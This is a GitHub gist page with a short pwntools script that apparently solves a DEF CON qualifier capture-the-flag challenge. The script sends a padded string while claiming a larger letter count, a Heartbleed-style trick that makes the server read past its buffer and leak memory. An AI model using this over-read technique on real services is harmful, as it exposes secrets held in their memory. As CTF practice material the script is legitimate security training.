Skip to content

Instantly share code, notes, and snippets.

@abeaumont
Last active May 23, 2016 07:36
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save abeaumont/451994a60c18419d88cf93f972bfe980 to your computer and use it in GitHub Desktop.
Save abeaumont/451994a60c18419d88cf93f972bfe980 to your computer and use it in GitHub Desktop.
from pwn import *
for i in range(512, 768):
t = remote('xkcd_be4bf26fcb93f9ab8aa193efaad31c3b.quals.shallweplayaga.me', 1354)
t.send('SERVER, ARE YOU STILL THERE? IF SO, REPLY "' + 'A' * 512 + '" ({} LETTERS)\n'.format(i))
print t.recvline()
t.close()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment